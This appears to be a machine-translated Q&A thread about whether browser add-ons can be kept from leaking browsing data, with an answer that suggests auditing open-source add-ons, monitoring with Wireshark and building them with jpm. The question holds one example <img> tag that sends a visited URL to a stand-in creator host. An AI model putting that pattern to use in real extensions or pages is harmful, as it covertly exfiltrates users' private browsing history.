В принципе, любое дополнение к браузеру может следить за мной, собирая историю браузера, веб-почту или другие конфиденциальные данные. AFAIKS, он может отправить эти данные обратно своему создателю, используя либо XMLHttpRequest() или fetch() либо манипулируя DOM, например, добавляя что-то вроде

<img src="http://addon-creators-page.com/?userid=uniqueId#https://sensitive-page.com/secret-link-i-visited"/>

запуск HTTP-запроса на странице создателя дополнения с возможностью отправки любых данных, которые ему нравятся. Однако не все надстройки должны выполнять HTTP-запросы или манипулировать DOM.

Отсюда вопрос:

Существует ли какое-либо существующее решение для некоторых браузеров, которое ограничивает функциональность JavaScript, доступную для надстройки, в частности, для манипулирования DOM и HTTP-запросов?

1 ответ1

2

Я не уверен, но это будет зависеть от вашего браузера. Вы можете использовать только плагины с открытым исходным кодом, которые позволят вам проверить, звонят ли они домой. Кроме того, вы можете использовать что-то вроде Wireshark для поиска любых запросов, отправленных процессом браузера на IP-адрес, отличный от веб-сайта, который вы посещаете. Кроме того, если вы используете Firefox, Mozilla часто звонит домой, если только вы не отключите телеметрию, и я не верю еще одной возможности в about:config. Я забыл другой вариант, но вы можете найти его здесь. Я не уверен, как запретить плагину звонить домой, я думаю, вы могли бы попытаться настроить Firefox и каким-то образом изменить способ запуска плагинов, чтобы они не отправляли веб-запросы. Это сделало бы большинство плагинов бесполезными, потому что им часто приходится отправлять веб-запросы на работу.

Чтобы убедиться, что надстройка с открытым исходным кодом не была взломана, вы можете скомпилировать ее самостоятельно. Из этого туториала Вы узнаете, как установить jpm, который может компилировать расширения Firefox. После установки jpm запустите:

jpm xpi

в исходном каталоге плагина для создания файла расширения xpi. Затем откройте XPI, который должен установить его. Скорее всего, он скажет вам, что он не заслуживает доверия, потому что он был скомпилирован и не подписан, или на сайте дополнений Mozilla. Это должно работать для большинства расширений, если они не очень старые.

Всё ещё ищете ответ? Посмотрите другие вопросы с метками .